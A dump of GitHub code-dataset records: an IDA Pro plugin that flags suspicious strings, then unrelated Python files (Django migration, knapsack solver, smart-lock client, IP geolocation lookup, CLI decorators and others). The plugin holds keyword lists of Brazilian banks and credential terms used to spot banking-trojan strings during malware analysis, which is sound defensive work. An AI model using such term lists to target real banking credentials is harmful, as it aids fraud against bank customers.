\"internetcaixa\",\n \"rendimento.com.br\",\n \"scotiabank\",\n \"rural.com.br\",\n \"unicard\",\n \"cielo\",\n \"serasa\",\n \"banespa\",\n \"mercantil\",\n \"bancoamazonia\",\n \"banparanet\",\n \"equifax\",\n \"lusobrasileiro\"\n]\n\nterms = [\n\t'token',\n 'login',\n\t'password',\n\t'username',\n\t'usuario',\n\t'senha',\n\t'agencia',\n\t'banco',\n\t'cartao',\n\t'simples',\n\t'proxy',\n\t'desconectado',\n\t'reconectar',\n\t'conex',\n 'http',\n 'fuck',\n \"adobe\",\n \".cpl\",\n \"premios\",\n \"promocao\",\n \"portal\",\n \"credencie\",\n \"cadastramento\",\n \"fatura\",\n \"sorteio\"\n]\n\n\nclass ByteStringsViewer_t(PluginForm):\n\n name = \"Strings Suspicious\"\n\n def Show(self):\n return PluginForm.Show(self,self.name,options = PluginForm.FORM_PERSIST)\n\n def OnCreate(self,form):\n self.parent = self.FormToPySideWidget(form)\n self.byte_strings = {}\n self.table = QtGui.QTableWidget()\n self.table.setRowCount(1)\n self.table.setColumnCount(3)\n #self.table.setHorizontalHeaderLabels((\"Address\",\"Function\",\"String\"))\n self.table.setHorizontalHeaderLabels([\"Strings\"])\n layout = QtGui.QVBoxLayout()\n layout.addWidget(self.table)\n self.clipboard = QtGui.QClipboard()\n self.Create()\n self.parent.setLayout(layout)\n\n def OnClose(self,form):\n global ByteStringForm\n del ByteStringForm\n\n def click_row(self):\n i = self.table.item(self.table.currentRow(),0)\n bstr = self.table.item(self.table.currentRow(),2)\n addr = i.text().strip()\n bstr = bstr.text()\n if not addr.startswith(\"0x\"):\n addr = get_name_ea(BADADDR,str(addr))\n else:\n addr = addr[2:10]\n addr= int(addr,16)\n Jump(addr)\n self.clipboard.setText(bstr)\n return\n\n def Create(self):\n self.table.clear()\n self.table.setColumnCount(1)\n self.table.setHorizontalHeaderLabels([\"Strings\"])\n #self.table.setHorizontalHeaderLabels((\"Address\",\"Function\",\"String\"))\n #self.table.itemClicked.connect(self.click_row)\n self.find_byte_strings()\n self.table.setRowCount(len(self.byte_strings.keys()))\n row = 0\n for addr,bstr in self.byte_strings.items():\n #self.table.setItem(row,0,QtGui.QTableWidgetItem(addr))\n #self.table.setItem(row,1,QtGui.QTableWidgetItem(addr))\n self.table.setItem(row,0,QtGui.QTableWidgetItem(bstr))\n self.table.resizeRowToContents(row)\n row += 1\n self.table.setSortingEnabled(False)\n\n def find_byte_strings(self):\n global terms\n global bbankers\n global disable_security\n # Append Brazilian Bankers to terms\n terms += bbankers\n terms += disable_security\n count = 1\n for ss in Strings():\n s = str(ss)\n if s.lower() in terms:\n self.byte_strings[str(count)] = s\n count = count + 1\n\ndef find_all_byte_strings():\n global ByteStringForm\n ByteStringForm = ByteStringsViewer_t()\n ByteStringForm.Show()\n ByteStringForm.table.resizeRowsToContents()\n ByteStringForm.table.resizeColumnsToContents()\n\n\nfind_all_byte_strings()\n","repo_name":"neriberto/IDA-Pro-Scripts","sub_path":"neriberto/strings_suspicious.py","file_name":"strings_suspicious.py","file_ext":"py","file_size_in_byte":5624,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"38637813988","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('github', '0005_auto_20151028_1218'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='githuborgindexpage',\n old_name='url',\n new_name='api_url',\n ),\n ]\n","repo_name":"City-of-Helsinki/devheldev","sub_path":"github/migrations/0006_auto_20151028_1221.py","file_name":"0006_auto_20151028_1221.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"66"} +{"seq_id":"12012621705","text":"fname = '/home/pinkgeek/PycharmProjects/PY4E/mbox-short.txt'\nfhand = open(fname)\ncounts = {}\n\n#Loop through text, getting timestamps\nfor line in fhand:\n words = line.split()\n if len(words) == 0: continue\n if words[0] != 'From': continue\n time = words[5]\n #Slice to get to the hour in the timestamp\n end = time.find(':')\n hour = time[0:end]\n # counter, add to dictionary: counts\n counts[hour] = counts.get(hour, 0) + 1\n\n#Create a list of tuples of the dictionary counts and sort\ncounter = list()\nfor k,v in list(counts.items()):\n counter.append((k,v))\n counter.sort()\n\n#Print sorted list, by hour:\nfor k,v in counter:\n print(k,v)\n","repo_name":"henkjeebee/Python3","sub_path":"Exercise 10.2.py","file_name":"Exercise 10.2.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21073550382","text":"class Object:\n def __init__(self, weight, value) -> None:\n super().__init__()\n self.weight = weight\n self.value = value\n self.ratio = value / weight\n\n def __lt__(self, other):\n return self.ratio < other.ratio\n\n def __eq__(self, other):\n return self.ratio == other.ratio\n\n def __repr__(self):\n return \"(\" + str(self.weight) + \", \" + str(self.value) + \") : \" + \"{0:.2f}\".format(self.ratio)\n\n\ndef read_file(path):\n objects = []\n with open(path, 'r') as file:\n capacity = int(file.readline())\n for line in file:\n exploded = line.split(' ')\n weight = int(exploded[0])\n value = int(exploded[1])\n objects.append(Object(weight, value))\n return capacity, sorted(objects, reverse=True)\n\n\ndef bound(objects, capacity_left, start):\n total_weight = 0\n total_value = 0\n for i in range(start, len(objects)):\n o = objects[i]\n if total_weight + o.weight >= capacity_left:\n place_left = capacity_left - total_weight\n ratio = place_left / o.weight\n total_value += o.value * ratio\n break\n total_value += o.value\n total_weight += o.weight\n return total_value\n\n\ndef branch(objects, max_value=0, deepness=0, weight=0, value=0):\n if deepness == len(objects):\n return value\n\n o = objects[deepness]\n\n b1 = value + bound(objects, capacity-weight, deepness)\n if b1 > max_value and weight+o.weight <= capacity:\n v1 = branch(objects, max_value, deepness+1, weight+o.weight, value+o.value)\n if v1 > max_value:\n max_value = v1\n\n b0 = value + bound(objects, capacity-weight, deepness+1)\n if b0 > max_value:\n v0 = branch(objects, max_value, deepness+1, weight, value)\n if v0 > max_value:\n max_value = v0\n\n return max_value\n\n\nif __name__ == '__main__':\n capacity, objects = read_file('data/sac0.txt')\n print(branch(objects))\n\n\n","repo_name":"LouisGerard/TP2_ARO","sub_path":"test_area.py","file_name":"test_area.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13995431390","text":"\"\"\"\r\n\r\n Lógica Difusa 01\r\n\r\n Santiago Ocampo Orrego - Código: 1004679255\r\n\r\n Ejemplo Futbol\r\n\r\n Cambios: - He modificado el diseño y la posición de las etiquetas\r\n\r\n\"\"\"\r\n\r\n# Paquetes requeridos\r\n\r\nimport numpy as np\r\nimport skfuzzy as sk\r\nimport matplotlib.pyplot as plt\r\n\r\n# Definiendo los rangos de velocidad de 0 a 80\r\nx = np.arange(30, 80, 0.1)\r\n\r\n# Definiendo las funciones de miembro triangulares\r\nlento = sk.trimf(x, [30, 30, 50])\r\nmedio = sk.trimf(x, [30, 50, 70])\r\nmedio_rapido = sk.trimf(x, [50, 60, 80])\r\nrapido = sk.trimf(x, [60, 80, 80])\r\n\r\n# Dibujando las funciones de membresía\r\nplt.figure()\r\nplt.plot(x, rapido, 'b', linewidth=1.5, label='Rápido')\r\nplt.plot(x, medio_rapido, 'k', linewidth=1.5, label='Medio-Rápido')\r\nplt.plot(x, medio, 'm', linewidth=1.5, label='Medio')\r\nplt.plot(x, lento, 'r', linewidth=1.5, label='Lento')\r\nplt.title('Penalti Difuso')\r\nplt.ylabel('Membresía')\r\nplt.xlabel('Velocidad (Kilometros Por Hora)')\r\nplt.legend(loc='best', fancybox=True, shadow=True)\r\n\r\nplt.show()","repo_name":"SantiagoOcampoOrrego/ComputacionBlanda","sub_path":"Tercera Previa/01 - Logica Difusa 01/futbol.py","file_name":"futbol.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32857297199","text":"import numpy as np\r\nfrom dezero import Variable\r\nimport dezero.functions as F\r\n\r\n\r\nx = Variable(np.array([[1, 2, 3], [4, 5, 6]]))\r\ny = F.sum(x, axis=0)\r\ny.backward()\r\nprint(x)\r\nprint(x.grad)\r\n\r\nx = Variable(np.random.randn(2, 3, 4, 5))\r\ny = x.sum(keepdims=True)\r\nprint(y.shape)","repo_name":"iinteger/deeplearning-from-scratch3","sub_path":"steps/step39.py","file_name":"step39.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"36932830047","text":"import Queue\n\n\nclass WorldMgr(object):\n \"\"\"World Manager.\"\"\"\n SYSTEM_LEVEL_FACTOR = 100\n SYSTEM_COMMON_LEVEL = 5\n entity_count = 0\n system_count = 0\n entity_id_record = 0\n system_id_record = 0\n system_dict = {}\n entity_dict = {}\n entity_add_queue = Queue.Queue()\n entity_remove_queue = Queue.Queue()\n system_entity_match_dict = {}\n\n def __init__(self):\n # TODO: sort system_dict\n for system in self.system_dict.itervalues():\n # print system.system_id\n self.system_entity_match_dict[system.system_id] = set()\n\n def update_all(self):\n # print 'WorldMgr update_all'\n self.update_entity_dict()\n for system in self.system_dict.itervalues():\n # print system.__class__\n self.do_update(system.update_entity, system.system_id)\n\n @classmethod\n def add_system(cls, system_id, system):\n cls.system_dict[system_id] = system\n\n @classmethod\n def add_entity(cls, entity):\n # print entity.__class__\n cls.entity_add_queue.put(entity)\n\n @classmethod\n def remove_entity(cls, entity):\n cls.entity_remove_queue.put(entity)\n\n @classmethod\n def generate_system_id(cls):\n cls.system_count += 1\n cls.system_id_record += 1\n return cls.system_id_record\n\n @classmethod\n def generate_entity_id(cls):\n cls.entity_count += 1\n cls.entity_id_record += 1\n return cls.entity_id_record\n\n @classmethod\n def clear_world_mgr_state(cls):\n raise NotImplementedError\n\n# private:\n\n def update_entity_dict(self):\n for system in self.system_dict.itervalues():\n while not self.entity_add_queue.empty():\n entity = self.entity_add_queue.get()\n # print entity.__class__\n self.do_add_entity(entity)\n\n while not self.entity_remove_queue.empty():\n entity = self.entity_remove_queue.get()\n self.do_remove_entity(entity)\n\n @classmethod\n def do_update(cls, func, system_id):\n if cls.system_entity_match_dict.get(system_id) is None:\n # print system_id\n return\n for entity_id in cls.system_entity_match_dict[system_id]:\n func(cls.entity_dict[entity_id])\n\n @classmethod\n def do_add_entity(cls, entity):\n if not cls.entity_dict.get(entity.entity_id):\n # print entity.entity_id\n cls.entity_dict[entity.entity_id] = entity\n cls.do_match_entity(entity)\n\n @classmethod\n def do_remove_entity(cls, entity):\n if cls.entity_dict.get(entity.entity_id):\n del cls.entity_dict[entity.entity_id]\n cls.remove_entity_match()\n\n @classmethod\n def do_match_entity(cls, entity):\n cls.remove_entity_match(entity)\n for system in cls.system_dict.itervalues():\n if cls.match_components(entity, system.get_attached_components()):\n cls.system_entity_match_dict[system.system_id]\\\n .add(entity.entity_id)\n\n @classmethod\n def remove_entity_match(cls, entity):\n for system in cls.system_dict.itervalues():\n if cls.system_entity_match_dict.get(system.system_id) is None:\n # print system.system_id\n return\n cls.system_entity_match_dict[system.system_id]\\\n .discard(entity.entity_id)\n\n @classmethod\n def match_components(cls, entity, components):\n for component in components:\n # print component\n if not entity.has_component(component):\n return False\n return True\n","repo_name":"qtg2015sclt/GameServer","sub_path":"ecs/worldmgr.py","file_name":"worldmgr.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14716389122","text":"import os\nimport click\nfrom click.types import StringParamType\nimport functools\n\nfrom hamlet.command.common.config import Options\n\n\ndef get_home_dir_default(subdir=\"\"):\n return os.path.join(\n click.get_app_dir(app_name=\"hamlet\", force_posix=True, roaming=False), subdir\n )\n\n\nclass CommaSplitParamType(StringParamType):\n envvar_list_splitter = \",\"\n\n def __repr__(self):\n return \"STRING\"\n\n\ndef common_cli_config_options(func):\n \"\"\"Add common CLI config options to commands\"\"\"\n\n @click.option(\n \"-p\",\n \"--profile\",\n default=None,\n envvar=\"HAMLET_PROFILE\",\n help=\"The name of the profile to use for configuration\",\n show_envvar=True,\n )\n @click.option(\n \"--hamlet-home-dir\",\n type=click.Path(file_okay=False, dir_okay=True, readable=True, writable=True),\n envvar=\"HAMLET_HOME_DIR\",\n default=get_home_dir_default(),\n help=\"The home directory used by hamlet\",\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"--cli-config-dir\",\n type=click.Path(file_okay=False, dir_okay=True, readable=True),\n envvar=\"HAMLET_CLI_CONFIG_DIR\",\n default=get_home_dir_default(\"config\"),\n help=\"The directory where profile configuration is stored\",\n show_default=True,\n show_envvar=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n Config file handling\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.hamlet_home_dir = kwargs.pop(\"hamlet_home_dir\")\n opts.load_config_file(\n profile=kwargs.pop(\"profile\"), searchpath=kwargs.pop(\"cli_config_dir\")\n )\n\n kwargs[\"opts\"] = opts\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n\n\ndef common_logging_options(func):\n \"\"\"Add common options for logging\"\"\"\n\n @click.option(\n \"--log-level\",\n envvar=\"GENERATION_LOG_LEVEL\",\n type=click.Choice(\n [\"fatal\", \"error\", \"warn\", \"info\", \"debug\", \"trace\"], case_sensitive=False\n ),\n default=\"info\",\n help=\"The minimum log event level\",\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"--log-format\",\n envvar=\"GENERATION_LOG_FORMAT\",\n type=click.Choice([\"compact\", \"full\"], case_sensitive=False),\n default=\"compact\",\n help=\"The format used for engine log messages\",\n show_default=True,\n show_envvar=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n Logging Options for the command line\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.log_level = kwargs.pop(\"log_level\")\n opts.log_format = kwargs.pop(\"log_format\")\n\n kwargs[\"opts\"] = opts\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n\n\ndef common_engine_options(func):\n \"\"\"Add common options for the engine\"\"\"\n\n @click.option(\n \"--engine\",\n envvar=\"HAMLET_ENGINE\",\n help=\"The name of the engine to use\",\n show_envvar=True,\n )\n @click.option(\n \"--engine-dir\",\n type=click.Path(\n dir_okay=True,\n file_okay=False,\n writable=True,\n readable=True,\n ),\n default=get_home_dir_default(\"engine\"),\n envvar=\"HAMLET_ENGINE_DIR\",\n help=\"The location of the hamlet engine store\",\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"--engine-config-dir\",\n type=click.Path(\n dir_okay=True,\n file_okay=False,\n writable=True,\n readable=True,\n ),\n default=get_home_dir_default(\"config\"),\n envvar=\"HAMLET_ENGINE_CONFIG\",\n help=\"The location of the hamlet engine config file for local engines\",\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"--engine-search-locations\",\n multiple=True,\n default=[\"installed\", \"local\", \"remote\"],\n type=click.Choice([\"installed\", \"local\", \"remote\", \"hidden\"]),\n show_default=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n Engine configuration options\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.set_engine_store(\n kwargs.pop(\"engine_dir\"), [kwargs.pop(\"engine_config_dir\")]\n )\n opts.set_engine(kwargs.pop(\"engine\"), kwargs.pop(\"engine_search_locations\"))\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n\n\ndef common_generation_options(func):\n \"\"\"Add common options for generation\"\"\"\n\n @click.option(\n \"-p\",\n \"--generation-provider\",\n envvar=\"GENERATION_PROVIDERS\",\n help=\"plugins to load for output generation\",\n default=[\"aws\"],\n type=CommaSplitParamType(),\n multiple=True,\n show_default=True,\n show_envvar=True,\n )\n @click.option(\n \"-f\",\n \"--generation-framework\",\n help=\"output framework to use for output generation\",\n default=\"cf\",\n show_default=True,\n )\n @click.option(\n \"-i\",\n \"--generation-input-source\",\n help=\"source of input data to use when generating the output\",\n default=\"composite\",\n show_default=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n Logging Options for the command line\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.generation_provider = kwargs.pop(\"generation_provider\")\n opts.generation_framework = kwargs.pop(\"generation_framework\")\n opts.generation_input_source = kwargs.pop(\"generation_input_source\")\n\n kwargs[\"opts\"] = opts\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n\n\ndef common_district_options(func):\n \"\"\"Add Common options for district config\"\"\"\n\n @click.option(\n \"--root-dir\",\n envvar=\"ROOT_DIR\",\n help=\"The root CMDB directory\",\n show_envvar=True,\n type=click.Path(\n file_okay=False,\n dir_okay=True,\n writable=True,\n resolve_path=True,\n allow_dash=False,\n ),\n )\n @click.option(\n \"--district-type\",\n envvar=\"DISTRICT_TYPE\",\n help=\"The type of district to target\",\n default=\"segment\",\n show_envvar=True,\n )\n @click.option(\n \"--tenant\",\n envvar=\"TENANT\",\n help=\"The tenant name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--account\",\n envvar=\"ACCOUNT\",\n help=\"The account name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--product\",\n envvar=\"PRODUCT\",\n help=\"The product name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--environment\",\n envvar=\"ENVIRONMENT\",\n help=\"The environment name to use\",\n show_envvar=True,\n )\n @click.option(\n \"--segment\",\n envvar=\"SEGMENT\",\n help=\"The segment name to use\",\n show_envvar=True,\n )\n @click.pass_context\n @functools.wraps(func)\n def wrapper(ctx, *args, **kwargs):\n \"\"\"\n District options from cmd line or file\n \"\"\"\n opts = ctx.ensure_object(Options)\n opts.root_dir = kwargs.pop(\"root_dir\")\n opts.district_type = kwargs.pop(\"district_type\")\n opts.tenant = kwargs.pop(\"tenant\")\n opts.account = kwargs.pop(\"account\")\n opts.product = kwargs.pop(\"product\")\n opts.environment = kwargs.pop(\"environment\")\n opts.segment = kwargs.pop(\"segment\")\n\n kwargs[\"opts\"] = opts\n return ctx.invoke(func, *args, **kwargs)\n\n return wrapper\n","repo_name":"hamlet-io/executor-python","sub_path":"hamlet/command/common/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"22354746271","text":"\"\"\"Test Kevo hub.\"\"\"\nfrom bs4 import BeautifulSoup\n\nimport websockets\nimport json\nimport asyncio\nimport aiohttp\n\n\nclass KevoError(Exception):\n \"\"\"Base exception for all Kevo errors\"\"\"\n\n pass\n\n\nclass Kevo(object):\n \"\"\"\n Common mykevo.com operations\n \"\"\"\n\n KEVO_URL_BASE = \"https://www.mykevo.com\"\n COMMANDS_URL_BASE = KEVO_URL_BASE + \"/user/remote_locks/command\"\n\n START_URL = KEVO_URL_BASE + \"/login\"\n LOGIN_URL = KEVO_URL_BASE + \"/signin\"\n AUTH_URL = KEVO_URL_BASE + \"/user/remote_locks/auth/show.json\"\n\n _loop = asyncio.get_event_loop()\n _callbacks = set()\n\n def __init__(self, username, password):\n self._username = username\n self._password = password\n self.session = None\n\n async def GetCsrfToken(self):\n \"\"\"\n Get a mykevo.com crsf token\n\n Returns:\n A csrf token (str)\n \"\"\"\n token = None\n\n async with self.session.get(Kevo.START_URL) as result:\n page = await result.text()\n login_page = BeautifulSoup(page, \"html.parser\")\n for field in login_page.find_all(\"input\"):\n if field.get(\"name\") == \"authenticity_token\":\n token = field.get(\"value\")\n break\n if not token:\n raise KevoError(\"Could not find auth token on signin page\")\n\n Kevo.token = token\n return token\n\n async def Login(self):\n \"\"\"\n Create a http session and login to mykevo.com\n \"\"\"\n self.session = aiohttp.ClientSession()\n token = await self.GetCsrfToken()\n login_payload = {\n \"user[username]\": self._username,\n \"user[password]\": self._password,\n \"authenticity_token\": token,\n }\n async with self.session.post(Kevo.LOGIN_URL, data=login_payload) as result:\n await result.text()\n\n async def _authGet(self, url):\n \"\"\"\n Perform an HTTP get to the url, and login if required\n\n Args:\n url: The url to perform the get request against\n\n Returns:\n A csrf token (str)\n \"\"\"\n if self.session == None:\n result = await self._authLoginGet(url)\n\n else:\n async with self.session.get(url) as resp:\n if resp.status == 500:\n result = await self._authLoginGet(url)\n\n result = await resp.json()\n\n return result\n\n async def _authLoginGet(self, url):\n \"\"\"\n Login and perform an HTTP GET to the url specified\n\n Args:\n url: The url to perform the get request against\n\n Returns:\n A csrf token (str)\n \"\"\"\n await self.Login()\n\n async with self.session.get(url) as resp:\n if resp.status == 500:\n raise KevoError(\n \"Unable to connect to kevo api: {}\".format(await resp.text())\n )\n\n result = await resp.json()\n\n return result\n\n async def GetLock(self, lockID):\n \"\"\"\n Gets details for a lock\n\n Args:\n lockID: The url to perform the get request against\n\n Returns:\n A csrf token (str)\n \"\"\"\n lock_detail_url = Kevo.COMMANDS_URL_BASE + \"/lock.json?arguments={}\".format(\n lockID\n )\n lock_details = await self._authGet(lock_detail_url)\n\n return lock_details\n\n def Register_callback(self, callback):\n \"\"\"Register callback, called when lock changes state.\"\"\"\n self._callbacks.add(callback)\n\n def Remove_callback(self, callback):\n \"\"\"Remove previously registered callback.\"\"\"\n self._callbacks.discard(callback)\n\n def ConnectWebSocket(self):\n \"\"\"Starts a task with a loop for the websocket connection\"\"\"\n self._loop.create_task(self._getStatusLoop())\n\n async def _getWsUrl(self):\n auth_details = await self._authGet(Kevo.AUTH_URL)\n\n wsurl = auth_details[\"socket_location\"]\n\n return wsurl\n\n async def _getStatusLoop(self):\n\n wsurl = await self._getWsUrl()\n\n async with websockets.connect(wsurl) as websocket:\n while True:\n try:\n text = await websocket.recv()\n except websockets.ConnectionClosed as e:\n if e.code == 1000:\n break\n # TODO: handle restarting the connection\n else:\n raise e\n for callback in self._callbacks:\n callback(json.loads(text))\n\n async def Lock(self, lockID):\n \"\"\"\n Lock this lock. If the lock is already locked, this method has no effect.\n \"\"\"\n command_url = Kevo.COMMANDS_URL_BASE + \"/remote_lock.json?arguments={}\".format(\n lockID\n )\n await self._authGet(command_url)\n\n async def Unlock(self, lockID):\n \"\"\"\n Unlock this lock. If the lock is already unlocked, this method has no effect.\n \"\"\"\n command_url = (\n Kevo.COMMANDS_URL_BASE + \"/remote_unlock.json?arguments={}\".format(lockID)\n )\n await self._authGet(command_url)\n","repo_name":"Noglen/hasskevo","sub_path":"custom_components/hasskevo/pykevo.py","file_name":"pykevo.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32851564882","text":"import argparse\nimport os\nimport os.path as osp\n\nimport cv2\nimport numpy as np\nimport pytorch_lightning\nimport torch\nfrom mmcv import Config\nfrom torchvision.transforms import ToTensor\nfrom tqdm import tqdm\nfrom models import MODELS\n\n\n# output dir\n_OUT_DIR = 'evaluation/star_result/'\n\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n '.tif', '.TIF', '.tiff', '.TIFF',\n]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--root_dir', type=str, default='data/CORN_2/testA', help='Tested dataset.')\n parser.add_argument('--config', type=str, default='rnw_star')\n parser.add_argument('--checkpoint', type=str, default='checkpoints/rnw_star/checkpoint_epoch=179.ckpt')\n parser.add_argument('--ref_img_path', type=str, default='data/CORN_2/trainB/aug_1_batch_1_54.tif')\n return parser.parse_args()\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\n\ndef make_dataset(directory):\n images = []\n assert os.path.isdir(directory), '%s is not a valid directory' % directory\n\n for root, _, fnames in sorted(os.walk(directory)):\n for fname in fnames:\n if is_image_file(fname):\n path = os.path.join(root, fname)\n images.append(path)\n return images\n\n\nif __name__ == '__main__':\n # parse args\n args = parse_args()\n # config\n cfg = Config.fromfile(osp.join('configs/', f'{args.config}.yaml'))\n # device\n device = torch.device('cuda')\n # read list file\n image_list = make_dataset(args.root_dir)\n # model\n net: pytorch_lightning.LightningModule = MODELS.build(name='rnw_star', option=cfg)\n net.load_state_dict(torch.load(args.checkpoint, map_location='cpu')['state_dict'])\n net.to(device)\n net.eval()\n print('Successfully load weights from check point {}.'.format(args.checkpoint))\n # transform\n to_tensor = ToTensor()\n # visualization\n visualization_dir = os.path.join(_OUT_DIR, 'visualization/')\n if not os.path.exists(visualization_dir):\n os.makedirs(visualization_dir)\n\n # no grad\n with torch.no_grad():\n # predict\n for idx, item in enumerate(tqdm(image_list)):\n # read image\n rgb = cv2.imread(item, 1)\n ref_img = cv2.imread(args.ref_img_path, 1)\n # to tensor\n t_rgb = to_tensor(rgb).unsqueeze(0).to(device)\n ref_img = to_tensor(ref_img).unsqueeze(0).to(device)\n # feed into net\n y_trg = torch.LongTensor([1]).to(device)\n outputs = net(t_rgb, ref_img, y_trg)\n disp = outputs\n\n # visualization\n disps = disp.cpu()[0, :, :, :].numpy() * 255\n disps = disps.transpose([1, 2, 0])\n out_fn = os.path.join(visualization_dir, 'aug_{}.png'.format((item.split(\"/\")[-1]).split('.')[0]))\n cv2.imwrite(out_fn, disps)\n\n # show message\n tqdm.write('Done.')\n","repo_name":"ChunmingHe/HQG-Net","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"66"} +{"seq_id":"8309285250","text":"DATABASES = {\n \"default\": \"dbname=osm user=osm password=osm host=localhost\"\n}\nRECIPES = []\nTILEJSON = {\n \"tilejson\": \"2.1.0\",\n \"name\": \"utilery\",\n \"description\": \"A lite vector tile server\",\n \"scheme\": \"xyz\",\n \"format\": \"pbf\",\n \"tiles\": [\n \"http://vector.myserver.org/all/{z}/{x}/{y}.pbf\"\n ],\n}\nBUILTIN_PLUGINS = ['utilery.plugins.builtins.CORS']\nPLUGINS = []\nDEBUG = False\nSRID = 900913\nSCALE = 1\nBUFFER = 0\nCLIP = False\nCORS = \"*\"\n","repo_name":"tilery/utilery","sub_path":"utilery/config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"66"} +{"seq_id":"27359529005","text":"#!/usr/bin/python3\n\nimport requests\nimport socket\nimport sys\n\nMSG_EXIT_USE = \"usage: python3 %s \"\nMSG_EXIT_INT = \"\\nkeyboard interrupt.\"\nMSG_EXIT_ERR = \"error: %s\"\n\ndef isValidAddress(ip_address):\n\t\"\"\" Checks if an IP address is valid or not (thanks to https://stackoverflow.com/a/4017219). \"\"\"\n\ttry:\n\t\tsocket.inet_pton(socket.AF_INET, ip_address)\n\texcept AttributeError:\n\t\ttry:\n\t\t\tsocket.inet_aton(ip_address)\n\t\texcept socket.error:\n\t\t\treturn False\n\t\treturn ip_address.count(\".\") == 3\n\texcept socket.error:\n\t\treturn False\n\treturn True\n\ndef printDetails(request_json):\n\t\"\"\" Prints details for an IP lookup request. \"\"\"\n\tprint(\"[+] lookup information for: %s\" % request_json[\"query\"])\n\tprint(\"[+] geolocation IP informations:\")\n\tprint(\"latitude > %s\" % str(request_json[\"lat\"]))\n\tprint(\"longitude > %s\" % str(request_json[\"lon\"]))\n\tprint(\"country > %s [%s]\" % (request_json[\"country\"], request_json[\"countryCode\"]))\n\tprint(\"region > %s [%s]\" % (request_json[\"regionName\"], request_json[\"region\"]))\n\tprint(\"city > %s (%s)\" % (request_json[\"city\"], request_json[\"zip\"]))\n\tprint(\"timezone > %s\" % request_json[\"timezone\"])\n\tprint(\"[+] general IP informations:\")\n\tprint(\"isp > %s\" % request_json[\"isp\"])\n\tprint(\"as number/name > %s\" % request_json[\"as\"])\n\tprint(\"organization name > %s\" % request_json[\"org\"])\n\t\ndef lookupAddress(ip_address):\n\t\"\"\" Gets details about the given IP address. \"\"\"\n\t\n\tapi_link = \"http://ip-api.com/json/\"\n\tif isValidAddress(ip_address) is False:\n\t\tsys.exit(MSG_EXIT_ERR % \"invalid ip address.\")\n\n\ttry:\n\t\trequest = requests.get(api_link + ip_address)\n\t\trequest_json = request.json()\n\t\tif request_json[\"status\"] == \"success\":\n\t\t\tprintDetails(request_json)\n\t\telse:\n\t\t\tsys.exit(MSG_EXIT_ERR % str(request.status_code))\n\texcept requests.exceptions.RequestException as error:\n\t\tsys.exit(MSG_EXIT_ERR % str(error))\n\nif __name__ == \"__main__\":\n\n\tif len(sys.argv) != 2:\n\t\tsys.exit(MSG_EXIT_USE % sys.argv[0])\n\n\ttry:\n\t\tlookupAddress(sys.argv[1])\n\texcept KeyboardInterrupt:\n\t\tsys.exit(MSG_EXIT_INT)\n\texcept Exception as error:\n\t\tsys.exit(MSG_EXIT_ERR % str(error))\n","repo_name":"kenuosec/py3-toolkit","sub_path":"scripts/lookup-ipv4.py","file_name":"lookup-ipv4.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"20584032391","text":"# -*- coding: utf-8 -*-\n\nweekday1 = ['Sun', 'Mon', 'Tue', 'Wed', 'Thr', 'Fri', 'Sat']\nweekday2 = ['日', '月', '火', '水', '木', '金', '土']\n\nfor en, ja in zip(weekday1, 